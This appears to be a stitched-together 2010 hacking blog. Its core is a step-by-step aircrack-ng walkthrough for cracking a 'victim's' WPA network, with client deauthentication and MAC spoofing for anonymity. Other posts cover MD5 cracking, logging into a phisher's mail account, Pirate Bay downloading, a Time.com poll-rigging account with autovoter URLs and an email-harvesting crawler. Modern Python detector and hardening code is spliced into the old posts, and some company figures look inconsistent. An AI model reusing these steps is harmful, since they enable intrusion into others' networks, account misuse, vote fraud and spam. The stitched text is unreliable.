Thursday 16 December 2010

16-year-old Dutch MasterCard DDoSer released!

By Qkyrie, Thursday 16th of December, 16:58


The 16-year-old boy from Zoetermeer, The Netherlands, also known as Jeroenz0r, who helped attack the sites of MasterCard and Visa, has been released. Authorities said it was no longer necessary to keep him in custody.
Jeroenz0r was one of the IRC operators of the channel in which several hacktivists prepared DDoS attacks on big company websites. Last Wednesday several big companies, such as MasterCard, were attacked and taken offline for some time. The "Anonymous" group of hacktivists wanted to protest against the companies' decision to block donations to WikiLeaks. After being arrested, Jeroenz0r confessed.

Although he was released, the Dutch Team High Tech Crime is still investigating the DDoS attacks and their origins.

Last Friday he was brought before the judge, who decided to keep him in custody for 13 days, but because he was no longer needed, that period was shortened.



Cracking WPA/WPA2 under Linux

Background

When going through a lot of forums, I noticed something strange: a lot of people were into cracking WEP, but still had a lot of questions about WPA. After these findings I, @_Qkyrie_, decided to just write my own tutorial :-)

Knowledge

If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is that if the passphrase is in some sort of dictionary, it can be cracked. You'll need a 4-way handshake from a client connecting to an AP. The 4-way handshake contains values derived from the passphrase, which can be attacked offline with a dictionary. You'll need a huge list and some luck that the passphrase is in it, or you can make a personal list with a password tool of your choice (like john), which will not be discussed in this tutorial ;-). For this tutorial I'll of course be using the Aircrack-ng suite.

Optional: laziness

    sudo su

You might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you can use this optional command.

Knowing what interface to use

First of all, you have to know the name of your wireless interface; that's why you type:

    iwconfig

Identifying your victim

    airmon-ng start interface

You'll get a small message saying "(monitor mode enabled on spoofedinterface)". In my case the monitor interface was "mon0".

    airodump-ng spoofedinterface

The next step is choosing your victim. Obviously you're looking for someone with WPA encryption now, since that's what you want to crack. Write down his BSSID and his CHANNEL.




Restarting the network card on the right channel

    airmon-ng stop spoofedinterface
    airmon-ng start interface CHANNEL

Start dumping to a file

    airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface

This starts airodump-ng on your specific channel (-c). It will look for handshakes of the specified BSSID and write everything to a capture file with the prefix psk (-w).
Notice! You might ask yourself: how do I know when I've captured a handshake? Well, aircrack thought of that: if you manage to capture a handshake, a message appears in the upper right corner.




Optional, but very helpful for speeding up the process

So you need to capture a handshake, but the people who are already connected of course won't be giving out a handshake, since that only happens during authentication. If we could just boot them off their network for a split second, so they reconnect, that would be perfect!

    aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofedinterface

This does 10 "deauthentication" attacks (-0 10), with the AP being BSSID (-a) and the client being booted off CLIENTBSSID (-c). You can check whether a client is connected by looking at your airodump-ng screen again. If you see at the bottom of that screen that someone is connected to the ESSID of your victim, simply use that STATION BSSID as CLIENTBSSID in this example.

    aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap

This cracks the actual capture file that was created by airodump-ng. Notice! You can only try to crack when a handshake actually took place. Don't forget: -w needs the path to your wordlist, so remember where you saved it!
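The aireplay-ng step above relies on a burst of 802.11 deauthentication frames, which is exactly the pattern a wireless IDS watches for. The detector below is an added example, not part of the original tutorial: it parses raw 802.11 management frames, counts deauthentication and disassociation frames per BSSID in a sliding window, and raises an alert once a burst crosses a threshold. It assumes frames without a radiotap header; the capture, MAC addresses and reason codes are constructed.

```python
import struct
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0) that knock a station off a network
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def parse_mgmt_frame(frame: bytes):
    """Parse a raw 802.11 frame (no radiotap header: an assumption of this example).

    Returns (subtype, dst, src, bssid, reason) for management frames, else None.
    The frame-control field is little-endian: bits 2-3 hold the type, bits 4-7 the subtype.
    """
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:            # not a management frame
        return None
    subtype = (fc >> 4) & 0xF
    dst, src, bssid = mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # reason code right after the 24-byte header
    return subtype, dst, src, bssid, reason


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, body: bytes = b"") -> bytes:
    """Build a minimal management frame for the constructed capture (FCS omitted)."""
    fc = subtype << 4                   # protocol version 0, type 0 (management)
    header = struct.pack("<HH", fc, 0) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    return header + struct.pack("<H", 0) + body      # sequence control, then body


class DeauthFloodDetector:
    """Alert when one BSSID sees >= threshold deauth/disassoc frames within `window` seconds."""

    def __init__(self, window: float = 5.0, threshold: int = 10):
        self.window, self.threshold = window, threshold
        self.seen = defaultdict(deque)   # bssid -> timestamps of recent deauth/disassoc frames
        self.alerts = []

    def feed(self, ts: float, frame: bytes):
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            return None                  # beacons, probes and data frames are ignored
        _, dst, _, bssid, reason = parsed
        q = self.seen[bssid]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) < self.threshold:
            return None
        alert = {"bssid": bssid, "count": len(q), "first": q[0], "last": ts,
                 "last_dst": dst, "last_reason": reason}
        self.alerts.append(alert)
        q.clear()                        # one alert per burst
        return alert


def analyze(capture, window: float = 5.0, threshold: int = 10):
    """Run the detector over [(timestamp, frame_bytes), ...] and return the alerts raised."""
    det = DeauthFloodDetector(window, threshold)
    for ts, frame in capture:
        det.feed(ts, frame)
    return det.alerts


# Constructed capture: one beacon, then a 12-frame deauth burst spoofed as coming from the AP
# towards a client (reason code 7), then a single unrelated deauth on another network.
AP, CLIENT, OTHER_AP = "02:00:00:aa:bb:01", "02:00:00:cc:dd:02", "02:00:00:ee:ff:03"
SAMPLE_CAPTURE = [(0.0, build_mgmt_frame(8, "ff:ff:ff:ff:ff:ff", AP, AP))]
SAMPLE_CAPTURE += [(1.0 + 0.1 * i, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)))
                   for i in range(12)]
SAMPLE_CAPTURE.append((3.0, build_mgmt_frame(SUBTYPE_DEAUTH, OTHER_AP, CLIENT, OTHER_AP, struct.pack("<H", 3))))
```

`analyze(SAMPLE_CAPTURE)` returns a single alert for the AP's BSSID, raised on the tenth frame of the burst; the lone deauth on the other network stays below the threshold.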




Optional security

As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your MAC.. Try to implement it yourself ;-)

    sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && sudo ifconfig spoofedinterface up

Wordlists

If you ever need some good wordlists, I suggest checking here first:
wordlists

Follow @_Qkyrie_

Friday 10 December 2010

How to install nessus on Ubuntu

I might have to explain what Nessus really is first..



Nessus is one of the most famous vulnerability scanners; here's an extract from their site:

The Nessus® vulnerability scanner is the world-leader in active scanners,
featuring high-speed discovery, configuration auditing, asset profiling,
sensitive data discovery and vulnerability analysis of your security posture.
Nessus scanners can be distributed throughout an entire enterprise, inside DMZs
and across physically separate networks.



Installation


First, you'll have to download Nessus and its plugins:

    sudo apt-get install nessusd nessus nessus-plugins

Now we'll make Nessus start by default:

    sudo ln -s /etc/init.d/nessusd /etc/rc2.d/S20nessusd

Now we're going to start up Nessus:

    /etc/init.d/nessusd start

Now we're going to add a user:

    sudo nessus-adduser

When asked for the user's rules, you just add "default accept" to be able to scan any host.

Now we'll restart Nessus:

    /etc/init.d/nessusd restart

And now we start up Nessus:

    sudo nessus

Barswf - Cracking hashes @ extreme speeds

What is Barswf?

Barswf is a program designed to crack MD5 hashes. It combines classic CPU cracking with the newer CUDA technology, so it uses your graphics card and, if available, multiple CPU cores to crack MD5 hashes.

It's considered one of the fastest cracking methods available.
Two charts to prove the point:

How to use it

This will be a short tutorial, since everything you need to know can be found in the help file that comes with Barswf.

    BarsWF_CUDA_x32.exe -h 7df9ad761904a6cd0dc1358949977da0 -c a -min_len 2

-h specifies the hash
-c specifies the character set:
    0 -> digits
    a -> lowercase letters
    A -> capitals
    ~ -> special characters
-min_len, I think this speaks for itself
-r -> resume from a saved file

Sources:
Barswf help file
Download: http://3.14.by/en/md5

Greetz
@_Qkyrie_

[Tutorial] Beating offline phishers!

First of all I'd like to say this is part 1 of a series of tutorials on how to track down malware or phishers. It was published last year, but due to great interest it has been re-uploaded to this blog.

This tutorial will basically show you one of the simplest ways to spot an offline phisher and to compromise his account or get him removed.
It all started when I saw this...




I figured that this was of course a simple phisher we had to download.
It would just need our World of Warcraft password, and the program would hack for us, inject gold, etc... this smelled phishy, no? :D
So I decided: let's download this uber hack. I downloaded it and decided to take a look.


Note: I certainly didn't run this kind of program on just my computer. I actually used a VirtualBox VM and a sandbox to keep it from harming my actual files. Never run possible malware on your own computer!

OK, it dropped no malware or anything, so it wouldn't be a keylogger, just a simple FTP function in the program, or a mail system.
That's when I wanted to start up a disassembler like w32dasm or Hiew, or maybe a hex editor (Bless Hex Editor for Ubuntu). But I saw this was most probably a program written in .NET, so I started up our beloved Stringstealer made by JapaBrz, which can be found in our tools section.
I was a bit lucky: indeed it was written in .NET.
So I started to look around to see how it was built.
I saw the main form, which was named "Hacks". And what function did I find there?






Bingo: no FTP system, just a simple SMTP function.
You would think it would be impossible to stop him now, since SMTP mail can be sent from any mail account, no password required.
But what did he do? He used two mail addresses: one of his own to send from, and one to receive the accounts. And the password for his receiving account was right under his email: 13131312..
The phisher didn't realise that once I compromised his from-address, the chain was broken and he wouldn't get any accounts anymore. So at some point I had 120 WoW accounts, but being a White Hat I deleted them, sorry for you guys ;-).
After that I reported the phisher's main address to Google, and they banned him; this is what they sent me..
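The string-stealer step above works because a .NET binary keeps its user strings as UTF-16LE in the metadata, so an ASCII-only strings dump misses them. The script below is an added example, not a tool from the post: it extracts both ASCII and UTF-16LE strings from a byte blob and flags mail addresses, SMTP-looking host names and whatever strings sit right after each address, which is where this phisher had stored his password. The sample binary is constructed; the addresses and the password in it are placeholders.

```python
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_strings(data: bytes, min_len: int = 4):
    """Yield (offset, encoding, text) for printable runs, both plain ASCII and UTF-16LE.

    .NET stores user string literals (the #US heap) as UTF-16LE, so an ASCII-only
    strings tool sees only every other byte and misses them entirely.
    """
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_run.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in utf16_run.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def mail_indicators(data: bytes, lookahead: int = 2):
    """Triage helper: addresses, SMTP-looking hosts and the strings stored right after each address.

    Credentials sitting next to an address are a heuristic (it is what the post describes),
    not a guarantee; the analyst still has to look at the decompiled code.
    """
    texts = [t for _, _, t in sorted(extract_strings(data), key=lambda s: s[0])]
    emails = [t for t in texts if EMAIL_RE.search(t)]
    smtp_hosts = [t for t in texts if "smtp" in t.lower() and "@" not in t]
    near = {}
    for i, t in enumerate(texts):
        if t in emails:
            near[t] = texts[i + 1:i + 1 + lookahead]
    return {"emails": emails, "smtp_hosts": smtp_hosts, "near": near}


def u16(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed stand-in for the phisher's .NET executable: a DOS-stub style ASCII string,
# then UTF-16LE literals separated by null pairs. Every value here is a placeholder.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12 + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 8
    + u16("smtp.example.invalid") + b"\x00\x00"
    + u16("sender@example.invalid") + b"\x00\x00"
    + u16("Password123-constructed") + b"\x00\x00"
    + u16("dropbox@example.invalid") + b"\x00\x00"
    + u16("Hacks") + b"\x00\x00"
)

if __name__ == "__main__":
    report = mail_indicators(SAMPLE_BINARY)
    print("addresses:", report["emails"])
    print("smtp hosts:", report["smtp_hosts"])
    for addr, following in report["near"].items():
        print(f"after {addr}: {following}")
```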


So, all in all, very easy to accomplish, and it helps the community; I'm sure a lot of people appreciate such acts ;-).
Tools:
String Stealer
optional Windows disassembler
Sandboxie

UPDATE:

Added a good program (Acekidd01 gave me the tip, thx ;-)) called Red Gate's Reflector.
It's an entirely free .NET decompiler (not a disassembler, an entire decompiler!).
It can show you the code of the classes and methods, and how everything relates. It also has a lot of add-ins that can be downloaded.

Links

Homepage: Red-Gate's Homepage
Add-ins: Codeplex - Reflector add-ins

µTorrent - a quicky!





uTorrent explained
Hi guys, today I'll be showing you what torrents are and how to install and work with uTorrent.

What is the BitTorrent Protocol?

Because it's probably easier to use an explanation that most of you should understand, I'll give you an extract of Wikipedia's explanation:

...
BitTorrent is a peer-to-peer file sharing protocol used for
distributing large amounts of data. BitTorrent is one of the most
common protocols for transferring large files, and it has been
estimated that it accounts for approximately 27-55% of all Internet
traffic (depending on geographical location) as of February 2009.


BitTorrent protocol allows users to distribute large amounts of data
without putting the level of strain on their computers that would be
needed for standard Internet hosting. A standard host's servers can
easily be brought to a halt if extreme levels of simultaneous data flow
are reached. The protocol works as an alternative data distribution
method that makes even small computers (e.g. mobile phones) with low
bandwidth capable of participating in large data transfers.
...

So basically, it's an easy and fast way to share files.

uTorrent

uTorrent is seen as one of the best programs for downloading files through torrents. It certainly is the smallest one ;-)

Installation of uTorrent


First off, go to the uTorrent site and download the client, preferably the newest stable one.

The installation is fairly easy. You just choose your language and press next a few times to leave everything at defaults values.

Configuration of uTorrent

Well, there isn't a lot you need to configure for uTorrent. If you use the normal Windows firewall, it'll prompt you to block (deny) or allow the connection; of course we want to allow it. If you use another type of firewall, simply check what port you are using by pressing CTRL+P in the main screen, go to Connection and write down the port. Then open that port in your firewall, and make sure it's opened in your router too.



Optional Configuration: Upload rate!

Sometimes you're restricted by an upload/download limit from your ISP. In that case you won't want to upload too much. You can simply reduce your upload rate in the preferences screen:
press CTRL+P, go to Bandwidth and put a relatively low number next to Maximum Upload Rate. In my example it's 2.



Using uTorrent to download a file

In my example, I thought I'd download the new Playmate calendar of 2010.

So I just went to The Pirate Bay and downloaded my torrent; the file has a .torrent extension. (Pirate Bay? -> Google it, it's one of the many torrent sites. If you need a specific file, you can go to The Pirate Bay or Mininova and search for it with the help of their nifty search boxes.)



Always remember: the more seeders a torrent has, the faster it will download!


To open the file, I simply double-clicked it, since I know uTorrent is the only software on my computer that can open torrents.


If it opens with a question about what to download, simply select the files you want and press Next.
The file will now download, and you'll see on the main screen what is happening.





After the file has downloaded (read: reached 100%), you can simply right-click it and choose Stop to stop uploading.



Finished

If you didn't understand parts of this tutorial, or you still have questions or comments, please do not hesitate to comment!

If, however, you did comprehend everything, you can now proudly consider yourself:

A uTorrent User

That's why I added 3 userbars for you to use in your signatures.




ESET - What is?

Brief History


ESET is a security company located in Bratislava, Slovakia. In 1992 Anton Zajac, a theoretical physicist who used programming as his primary research tool, founded ESET together with his colleagues Maros Grund, Rudolf Hruby, Richard Marko, Peter Pasko and Miroslav Trnka.
ESET has several branches and partners all over the world[1]. The company employs roughly 200 people.

Products


Anton Zajac started the company at a time when worms and viruses were being invented and deployed. It was the Michelangelo worm that got him thinking about antivirus software. The first project the team created was therefore NOD, antivirus software that ran on MS-DOS. After a few years they changed the name to NOD32, and for legal reasons later to NOD32 Antivirus.
Over the years they decided to create and deploy a second product. It was – and still is – a combination of NOD32 Antivirus with antispam and firewall functions. They named it “ESET Smart Security”.

Market Share


We’re not going to lie: when talking about antivirus software, there are a lot of competing companies. In Germany Panda is used the most; in Eastern and Central Europe it’s Kaspersky. Still, with roughly 150 000 users in 160 countries, ESET has a market share of 9%.
ESET has seen nice growth over the years, with tremendous gains. In 2006 its revenue was about $33.6 million; in 2009 it had a revenue of $111.4 million, a growth of roughly 228 percent. For the end of this year, ESET is estimating growth of more than 50% and a market share of about 10%.

Organizational Chart


To understand just how big ESET really is, an organizational chart helps a lot. ESET has one Chief Executive Officer, Anton Zajac, one of the founders. The company is divided into two parts: a headquarters in Eastern Europe and one in America. Quite a few people hold an executive function; you can see them all on the organizational chart. What will probably strike you is that almost all of the founders are still working at the company.


European Headquarters - ESET, spol. s.r.o.




North American Headquarters - ESET, LLC.

Marblecake, also the game

Inside the precision hack

There’s a scene toward the end of the book Contact by Carl Sagan, where the protagonist Ellie Arroway finds a Message embedded deep in the digits of PI. The Message is perhaps an artifact of an extremely advanced intelligence that apparently manipulated one of the fundamental constants of the universe as a testament to their power as they wove space and time. I’m reminded of this scene by the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts. Just as Ellie found a Message embedded in PI, we find a Message embedded in the results of this poll. Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers.
At 4AM this morning I received an email inviting me to an IRC chatroom where someone would explain to me exactly how the Time.com 100 Poll was precision hacked. Naturally, I was a bit suspicious. Anyone could claim to be responsible for the hack – but I ventured onto the IRC channel (feeling a bit like a Woodward or Bernstein meeting Deep Throat in a parking garage). After talking to ‘Zombocom’ (not his real nick) for a few minutes, it was clear that Zombocom was a key player in the hack. He explained how it all works.

The Beginning
Zombocom told me that it all started out when the folks that hang out on the random board of 4chan (sometimes known as /b/) became aware that Time.com had enlisted moot (the founder of 4chan) as one of the candidates in the Time.com 100 poll. A little investigation showed that a poll vote could be submitted just by doing an HTTP GET on the URL:

    http://www.timepolls.com/contentpolls/Vote.do?pollName=time100_2009&id=1883924&rating=1

where id is a number associated with the person being voted for (in this case 1883924 is Rain’s ID).
Soon afterward, several people crafted ‘autovoters’ that would use the simple voting URL protocol to vote for moot. These simple autovoters could be triggered by an easily embeddable ‘spam URL’. The autovoters were very flexible, allowing the rating to be set for any poll candidate. For example, the URL

    http://fun.qinip.com/gen.php?id=1883924&rating=1&amount=160

could be used to push 160 ratings of 1 (the worst rating) for the artist Rain to the Time.com poll.
In early stages of the poll, Time.com didn’t have any authentication or validation – the door was wide open to any client that wanted to stuff the ballot box. Soon these autovoting spam urls were sprinkled around the web voting up moot. If you were a fan of Rain, it is likely that when you visited a Rain forum, you were really voting for moot via one of these spam urls.
Soon afterward, it was discovered that the Time.com Poll didn’t even range check its parameters to ensure that the ratings fell within the 1 to 100 range. The autovoters were adapted to take advantage of this loophole, which resulted in the Time.com poll showing moot with a 300% rating, while all other candidates had ratings far below zero. Time.com apparently noticed this and intervened by eliminating millions of votes for moot and restoring the poll to a previous state (presumably) from a backup. Shortly afterward, Time.com changed the protocol to attempt to authenticate votes by requiring that a key be appended to the poll submission URL that consisted of an MD5 hash of the URL + a secret word (AKA ‘the salt’).
“Needless to say, we were enraged” says Zombocom. /b/ responded by getting organized – they created an IRC channel (#time_vote) devoted to the hack, and started to recruit. Shortly afterward, one of the members discovered that the ‘salt’, the key to authenticating requests, was poorly hidden in Time.com’s voting flash application and could be extracted. With the salt in hand – the autovoters were back online, rocking the vote.
Another challenge faced by the autovoters was that if you voted for the same person more often than once every 13 seconds, your IP would be banned from voting. However, it was noticed that you could cycle through votes for other candidates during those 13 seconds. The autovoters quickly adapted to take advantage of this loophole interleaving up-votes for moot with down-votes for the competition ensuring that no candidate received a vote more frequently than once every 13 seconds, while maximizing the voting leverage.
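The three weaknesses described above (a key any client can compute because the salt shipped inside the Flash app, no range check on rating, and a per-candidate rate limit that interleaving sidesteps) are easiest to see next to their fixes. The model below is an added example and not Time.com's code: WeakPoll reproduces the behaviour the article describes, HardenedPoll applies server-issued single-use tokens, a 1..100 range check and a per-IP limit that ignores which candidate is voted for. The salt, the client IP and candidate ids 1 to 4 are constructed; 1883924 is Rain's id from the article.

```python
import hashlib
import secrets
from collections import defaultdict

SALT = "constructed-leaked-salt"   # stands in for the secret that shipped inside the poll's Flash client


def vote_url(candidate_id: int, rating: int) -> str:
    return f"/contentpolls/Vote.do?pollName=time100_2009&id={candidate_id}&rating={rating}"


def weak_key(url: str, salt: str = SALT) -> str:
    """The scheme the article describes: MD5(url + salt). Whoever holds the salt mints valid keys."""
    return hashlib.md5((url + salt).encode()).hexdigest()


class WeakPoll:
    """Behaviour as described: key check only, no range check, 13 s limit per (ip, candidate)."""

    def __init__(self):
        self.scores = defaultdict(list)
        self.last = {}                       # (ip, candidate) -> time of the last accepted vote

    def vote(self, ip, candidate_id, rating, key, now):
        if key != weak_key(vote_url(candidate_id, rating)):
            return "bad key"
        if now - self.last.get((ip, candidate_id), float("-inf")) < 13:
            return "banned"
        self.last[(ip, candidate_id)] = now
        self.scores[candidate_id].append(rating)   # 300 or -50 go straight in
        return "ok"


class HardenedPoll:
    """Server-side fixes: single-use server-issued tokens, rating range check, per-IP limit for any candidate."""
    MIN_RATING, MAX_RATING = 1, 100

    def __init__(self, per_ip_interval: float = 13.0):
        self.interval = per_ip_interval
        self.scores = defaultdict(list)
        self.last_by_ip = {}
        self.tokens = set()                  # outstanding one-time tokens; nothing client-side derives them

    def issue_token(self) -> str:
        token = secrets.token_hex(16)
        self.tokens.add(token)
        return token

    def vote(self, ip, candidate_id, rating, token, now):
        if token not in self.tokens:
            return "bad token"
        self.tokens.discard(token)           # consumed even if the vote is rejected below
        if not self.MIN_RATING <= rating <= self.MAX_RATING:
            return "rating out of range"
        if now - self.last_by_ip.get(ip, float("-inf")) < self.interval:
            return "rate limited"            # switching candidates no longer helps
        self.last_by_ip[ip] = now
        self.scores[candidate_id].append(rating)
        return "ok"


def demo_weak():
    """Replays the article's tricks against the weak model; everything is accepted except the last call."""
    poll, ip, rain = WeakPoll(), "198.51.100.7", 1883924
    out = {"forged_key_out_of_range": poll.vote(ip, rain, 300, weak_key(vote_url(rain, 300)), 0.0)}
    # votes for four different candidates one second apart: the per-candidate limiter never fires
    out["interleaved"] = [poll.vote(ip, cid, 100, weak_key(vote_url(cid, 100)), float(cid))
                          for cid in (1, 2, 3, 4)]
    out["same_candidate_again"] = poll.vote(ip, 1, 100, weak_key(vote_url(1, 100)), 5.0)
    return out


def demo_hardened():
    """The same sequence against the hardened model."""
    poll, ip, rain = HardenedPoll(), "198.51.100.7", 1883924
    out = {"forged_key": poll.vote(ip, rain, 50, weak_key(vote_url(rain, 50)), 0.0)}
    out["out_of_range"] = poll.vote(ip, rain, 300, poll.issue_token(), 0.0)
    token = poll.issue_token()
    out["first"] = poll.vote(ip, 1, 100, token, 1.0)
    out["replayed_token"] = poll.vote(ip, 2, 100, token, 2.0)
    out["interleaved"] = poll.vote(ip, 2, 100, poll.issue_token(), 2.0)
    out["after_interval"] = poll.vote(ip, 2, 100, poll.issue_token(), 14.0)
    return out
```

`demo_weak()` shows the forged key, the out-of-range rating and the interleaved votes all returning "ok"; `demo_hardened()` rejects each of them and only accepts a fresh token once the per-IP interval has passed.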

One of the first autovoters was MOOTHATTAN. This is a simple moot up-voter that will vote for moot about 100 times per minute. (Warning, just by visiting that site, you’ll invoke the autovoter – so if you don’t want to hack the vote, you should probably skip the visit).
Here’s a screenshot of another autovoter, a program called Mooter, developed by rdn:
Mooter is a Delphi app (Windows only) that can submit about 300 votes per minute from a single IP address. It will also take advantage of any proxies and cycle through them so that the votes appear to be coming from multiple IP addresses. rdn, the author of Mooter, has used Mooter to submit 20 thousand votes in a single 15 minute period. In the last two weeks (when rdn started keeping track) Mooter alone has submitted 10,000,000 votes (about 3.3% of the total number of poll votes).
From the screenshot you can see that Mooter is quite a sophisticated application. It allows fine grained control over who receives votes, what type of rating they get, voting frequency, the proxy cycle, along with charts and graphs showing all sorts of nifty data.
In addition to highly configurable autovoting apps, the loose collective of #time_vote maintains charts and graphs of the various candidate voting histories. Here’s a voting graph that shows the per-minute frequency of votes for boxer Manny Pacquiao.
More charts are available for browsing at (the very slow to load) http://fun.qinip.com/mvdc/mootvote.php
So with the charts, graphs, spam URLs and autovoters #time_vote had things well in hand. Moot would easily cruise to a victory, although they still had some annoying competition, especially from fans of the boxer Manny Pacquiao. Zombocom says that “it can take upwards of 4.5K votes a minute to keep Manny in his place”. Despite the Manny problem, the #time_vote collective had complete dominance of the poll.

The Ultimate Precision Hack

At this point Zombocom was starting to get bored and so he started fiddling with his voting scripts. Much to his surprise, he found that no matter what he did, he was never getting banned by Time.com. Zombocom suspects that his ban immunity may be because he’s running an ipv6 stack which may be confusing Time.com’s IP blocker. With no 13 second rate limit to worry about, he was able to crank out votes as fast as his computer would let him – about 5,000 votes a minute (and soon he’ll have a new server online that should give him up to 50,000 votes a minute.) With this new found power, Zombocom was able to take the hack to the next level.

Zombocom joked to one of his friends: “it would be funny to troll Time.com and put us up as most influential, but since we are not explicitly on the list we’ll have to spell it out.” His friend thought it was impossible. But two weeks later, “marblecake” was indeed spelled out for all to see at the top of the Time.com poll.
So what is the significance of ‘marblecake’? Zombocom says: “Marblecake was an irc channel where the “Message to Scientology” video originated. Many believe we are “dead” or only doing hugraids etc, so I thought it would also be a way of saying: we’re still around and we don’t just do only “moralfag” stuff.”
To actually manipulate the poll, Zombocom wrote two perl scripts. The first one, auto.pl is pretty simple. It finds the highest rated person in the poll that is not in the desired top 21 (recall, there are 21 characters in the Message) and down-votes them (you can view this as eliminating the riff-raff). The second perl script, the_game.pl is responsible for maintaining the proper order of the top 21 by inspecting the rating of a particular person and comparing that rating to what it should be to maintain the proper order and then up-voting or down-voting as necessary to get the desired rating. With these two scripts, (less than 200 lines of perl) Zombocom can put the poll in any order he wants.

Ultimately, this hack involved lots of work and a little bit of luck. Someone figured out the voting URL protocol. A bunch of folks wrote various autovoters, which were then used by a thousand or more to stack the vote in moots favor. Others, sprinkled the spam urls throughout the forums tricking the ‘competition’ into voting for moot. When Time.com responded by trying to close the door on the hacks, the loose collective rallied and a member discovered the ‘salt’ that would re-open the poll to the autovoters. The lucky bit was when Zombocom discovered that no matter what he did, he wouldn’t get banned. This opened the door to the fine grained manipulation that led to the embedding of the Message.

At the core of the hack is the work of a dozen or so, backed by an army of a thousand who downloaded and ran the autovoters and also backed by an untold number of others that unwittingly fell prey to the spam url autovoters. So why do they do it? Why do they write code, build complex applications, publish graphs – why do they  organize a team that is more effective than most startup companies? Says Zombocom: “For the lulz”.

source: http://musicmachinery.com/2009/04/15/inside-the-precision-hack/

Thursday 9 December 2010

[Dutch] Paper on open wireless networks

Open wireless networks - By Quinten De Swaef


For a school assignment we had to write papers on something related to law and IT.
I decided to go for wireless networks, more specifically: open wireless networks.

In the paper I discuss different kinds of networks, different kinds of protection layers and solutions. The second part includes a discussion of the various problems when it comes to your rights and duties versus open networks.

For example: Your smartphone automatically connects to an open wireless network. Is this illegal?

Unfortunately, the paper is written in Dutch, and therefore the court orders and decisions are based on Belgian and Dutch laws.

The paper can be downloaded from mediafire

EmailCrawler

What is it?

The Website Crawler was a project we started in order to master regular expressions. We kept developing it and eventually made an email crawler.
It is being designed with "the three level crawler" in mind. The three level crawler is a concept we invented to make sure the user can choose how deep he wants to crawl.
The basic email crawler is already finished, but we're waiting for some more optimisations before releasing it.

Three Level Crawler?

The Three Level Crawler is a concept designed by Qkyrie. It is basically a way to choose how deep you want to crawl the internet for specific data.
A level one crawler only searches the given websites. Suppose, for example, that you have a big list of sites: you can add them all to the program and it will check those specific websites for information.
The level two crawler searches the given webpage as well as all the webpages found as links on that first webpage. This gives you a deeper search and will guarantee you some more emails. All of this happens concurrently, which means the speed is nice and everything can be followed live.
The level three crawler is a constant crawler. It keeps searching the webpages found by a level 2 crawler, and keeps doing this until a certain amount is found or until the user chooses to stop the process.


Free vs Paying?

Yes, fortunately for some of you poor students, there's also a free version!
Of course, to maintain our servers and programming a bit, we added some nice add-ons you'd really love in the paid version.
There's a way to add an entire file containing webpages to be crawled. Another add-on is a tool to maintain your email lists: deduplicators, categories, you name it, we add it.
We will also add a way to search the most famous search engines (Google/Bing) for websites matching your criteria.
Emails coming from those websites will be added.

small example


Release!

We finally released the Pro version of our webcrawler. It has some nice features that won't be available in the free version (which is not yet released). You can buy it now and a mail with the program will be sent to you shortly. If you think it takes us too long to send it to you, feel free to mail us ;-)

Wednesday 8 December 2010

Launch!

Hey everyone,

As of today, 9/12/2010, we wanted to launch this new blog.
This blog will contain a lot of computer related articles and finds.

Most of these will be about new technologies, programming and security.

Get prepared ;)